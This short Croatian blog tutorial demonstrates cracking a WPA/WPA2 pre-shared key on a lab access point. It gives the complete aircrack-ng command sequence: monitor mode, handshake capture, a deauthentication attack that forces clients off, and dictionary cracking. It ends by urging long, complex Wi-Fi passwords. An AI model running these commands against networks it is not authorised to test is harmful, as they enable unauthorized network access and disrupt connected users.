No WPA/WPA2 protokoli su ranjivi na bruteforce dictionary napade jer napadač koji sluša razgovor između Access Pointa i klijenta može saznati sve podatke koji su mu potrebni za bruteforcanje PSK-a (WPA handshake, SSID, authenticator nounce, supplicant nounce, authenticator MAC, supplicant MAC)
Za demonstraciju napada pripremljen je AP s jednostavnim passwordom i SSID-em PENtestLAB.
Na omiljenoj pentest distribuciji moramo prvo pokrenuti airmon:
airmon-ng start wlan0NAkon toga sve radimo sa interfaceom mon0. Pokrećemo airodump da nadjemo podatke o našem SSID-u koji ćemo napasti:
airodump-ng mon0
Nakon što smo saznali BSSID, pokrećemo airodump tako da monitorira kanal na kojem je naš AP:
airodump-ng –bssid 62:A6:D9:99:F3:7f --channel 2 -w pentestlab mon0
Sada je potrebno pričekati dok se neki klijent ne spoji ili ako je klijent već spojen, možemo ga prisiliti da se odspoji:
aireplay-ng -0 5 -a 62:A6:D9:99:F3:7f mon0Uhvatili smo WPA handshake:
Sada možemo krenuti u probijanje PSK-a sa aircrackom:
aircrack-ng pentestlab-01.cap -w /media/test/passuniq.txtI ukoliko nam se PSK poklapa s nekim iz našeg riječnika, dobiti ćemo key:
Nadam se da ovaj tutorial demonstrira zašto je potrebno koristiti duge i komplicirane passworde kod štićenja bežičnih mreža.
No comments:
Post a Comment